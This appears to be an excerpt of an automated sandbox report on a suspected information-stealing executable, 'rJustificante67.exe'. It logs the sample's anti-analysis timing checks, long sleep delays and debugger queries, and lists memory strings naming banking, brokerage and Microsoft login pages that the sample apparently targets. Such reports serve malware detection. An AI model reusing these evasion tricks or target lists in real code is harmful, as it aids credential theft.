            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\rJustificante67.exeAPI/Special instruction interceptor: Address: 38AF59C
            Source: C:\Users\user\Desktop\rJustificante67.exeAPI/Special instruction interceptor: Address: 1DEF59C
            Source: C:\Users\user\Desktop\rJustificante67.exeRDTSC instruction interceptor: First address: 3884CF4 second address: 3884CF4 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F5C85247A97h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\rJustificante67.exeRDTSC instruction interceptor: First address: 1DC4CF4 second address: 1DC4CF4 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F5C8523A437h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\rJustificante67.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeMemory allocated: 32E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeMemory allocated: 32C30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4DEB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJustificante67.exeAPI coverage: 2.3 %
            Source: C:\Users\user\Desktop\rJustificante67.exe TID: 3116Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exe TID: 3116Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_00402706 FindFirstFileW,3_2_00402706
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405731
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_004061E5 FindFirstFileW,FindClose,3_2_004061E5
            Source: C:\Users\user\Desktop\rJustificante67.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeThread delayed: delay time: 600000Jump to behavior
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd4f75dbc47cdd<
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3907242977.0000000002868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\rJustificante67.exeAPI call chain: ExitProcess graph end nodegraph_0-4472
            Source: C:\Users\user\Desktop\rJustificante67.exeAPI call chain: ExitProcess graph end nodegraph_0-4471
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00402D52 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,CreateFileW,LdrInitializeThunk,0_2_00402D52
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Users\user\Desktop\rJustificante67.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
